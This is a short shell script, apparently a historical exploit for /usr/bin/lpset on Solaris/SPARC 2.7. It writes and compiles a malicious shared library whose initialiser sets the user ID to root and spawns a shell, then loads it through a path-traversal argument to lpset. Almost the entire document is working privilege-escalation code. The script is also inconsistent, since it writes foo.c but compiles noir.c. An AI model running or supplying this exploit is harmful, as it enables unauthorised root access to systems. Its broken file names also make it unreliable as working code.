#!/bin/sh
#
# /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
# script by noir@gsu.linux.org.tr
#
# lpset seems to use strcat to append paths (-r)
# but there is a special case /usr/lib/print/lib has to be present
#

cat > foo.c << EOF
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
	setuid(0);
	system("/bin/sh");
}
EOF

echo "Compiling ..."

gcc -fPIC -c noir.c -g -DSOLARIS -Wall
ld -G -o noir.so noir.o -ldl

chmod 755 noir.so

rm -f noir.c
rm -f noir.o

/usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir